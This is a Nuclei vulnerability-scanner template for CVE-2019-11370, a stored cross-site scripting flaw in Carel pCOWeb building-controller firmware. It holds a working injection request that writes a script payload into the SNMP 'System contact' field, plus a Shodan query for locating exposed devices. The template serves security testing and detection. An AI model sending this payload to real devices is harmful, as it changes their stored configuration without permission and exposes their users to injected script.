nuclei-templates/cves/2019/CVE-2019-11370.yaml

46 lines
1.3 KiB
YAML

id: CVE-2019-11370
info:
name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
reference:
- https://www.exploit-db.com/exploits/46897
- https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
- https://nvd.nist.gov/vuln/detail/CVE-2019-11370
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2019-11370
cwe-id: CWE-79
metadata:
shodan-query: http.html:"pCOWeb"
verified: "true"
tags: cve,cve2019,pcoweb,xss,carel
requests:
- raw:
- |
POST /config/pw_snmp_done.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
- |
GET /config/pw_snmp.html HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "text/html")'
- status_code_2 == 200
- contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
condition: and
# Enhanced by mp on 2022/08/08